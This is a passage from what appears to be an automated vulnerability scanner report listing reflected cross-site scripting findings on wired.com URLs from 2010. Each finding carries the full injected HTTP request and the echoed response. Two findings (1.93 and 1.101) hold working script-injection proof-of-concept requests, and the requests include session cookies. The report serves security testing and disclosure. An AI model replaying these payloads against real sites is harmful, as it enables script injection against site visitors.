<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee3632"><a>7fc96fc4812 ss_design">
...[SNIP]...

1.89. http://www.wired.com/culture/design [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4088a"><a>cab77e397f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design4088a"><a>cab77e397f3 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:29 GMT
Date: Sun, 21 Nov 2010 23:06:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design4088a"><a>cab77e397f3">
...[SNIP]...

1.90. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da2f5"><a>35b68f7c68f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureda2f5"><a>35b68f7c68f/design/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureda2f5"><a>35b68f7c68f ss_design c_multimedia">
...[SNIP]...

1.91. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4136"><a>4e71b2b298e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/designe4136"><a>4e71b2b298e/multimedia/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:19 GMT
Date: Sun, 21 Nov 2010 23:07:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_designe4136"><a>4e71b2b298e c_multimedia">
...[SNIP]...

1.92. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1447"><a>17257c56c9f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/design/multimediae1447"><a>17257c56c9f/2008/06/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29304
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_design c_multimediae1447"><a>17257c56c9f">
...[SNIP]...

1.93. http://www.wired.com/culture/design/multimedia/2008/06/gallery_trains [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/design/multimedia/2008/06/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload add6e"><script>alert(1)</script>a2b64047b26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/design/multimedia/2008/06/gallery_trains?add6e"><script>alert(1)</script>a2b64047b26=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.94. http://www.wired.com/culture/education [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c45a8"><a>9f611b39064 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec45a8"><a>9f611b39064/education HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec45a8"><a>9f611b39064 ss_education">
...[SNIP]...

1.95. http://www.wired.com/culture/education [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/education

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2c85"><a>d84992dbbe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/educationb2c85"><a>d84992dbbe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29261
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_educationb2c85"><a>d84992dbbe">
...[SNIP]...

1.96. http://www.wired.com/culture/lifestyle [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af4cf"><a>703cee33c83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureaf4cf"><a>703cee33c83/lifestyle HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:04 GMT
Date: Sun, 21 Nov 2010 23:06:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureaf4cf"><a>703cee33c83 ss_lifestyle">
...[SNIP]...

1.97. http://www.wired.com/culture/lifestyle [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f876e"><a>59992d190ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestylef876e"><a>59992d190ca HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29263
Vary: Accept-Encoding
Cache-Control: max-age=588
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestylef876e"><a>59992d190ca">
...[SNIP]...

1.98. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a99"><a>d3ff9573830 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture95a99"><a>d3ff9573830/lifestyle/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture95a99"><a>d3ff9573830 ss_lifestyle c_multimedia">
...[SNIP]...

1.99. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 904b7"><a>ee778010cae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle904b7"><a>ee778010cae/multimedia/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:37 GMT
Date: Sun, 21 Nov 2010 23:06:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle904b7"><a>ee778010cae c_multimedia">
...[SNIP]...

1.100. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a306"><a>ecc32f97413 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle/multimedia4a306"><a>ecc32f97413/2007/10/gallery_canned_foods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29316
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:55 GMT
Date: Sun, 21 Nov 2010 23:06:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle c_multimedia4a306"><a>ecc32f97413">
...[SNIP]...

1.101. http://www.wired.com/culture/lifestyle/multimedia/2007/10/gallery_canned_foods [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2007/10/gallery_canned_foods

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e513"><script>alert(1)</script>0b37a4181f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:19 GMT
Date: Sun, 21 Nov 2010 23:06:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42065


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2007/10/gallery_canned_foods?7e513"><script>alert(1)</script>0b37a4181f6=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.102. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca90b"><a>e339c09d9c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureca90b"><a>e339c09d9c5/lifestyle/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureca90b"><a>e339c09d9c5 ss_lifestyle c_multimedia">
...[SNIP]...

1.103. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42d5a"><a>f39aa6a9d07 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29308
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:36 GMT
Date: Sun, 21 Nov 2010 23:06:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia">
...[SNIP]...

1.104. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/lifestyle/multimedia/2008/11/gallery_vote

Issue detail

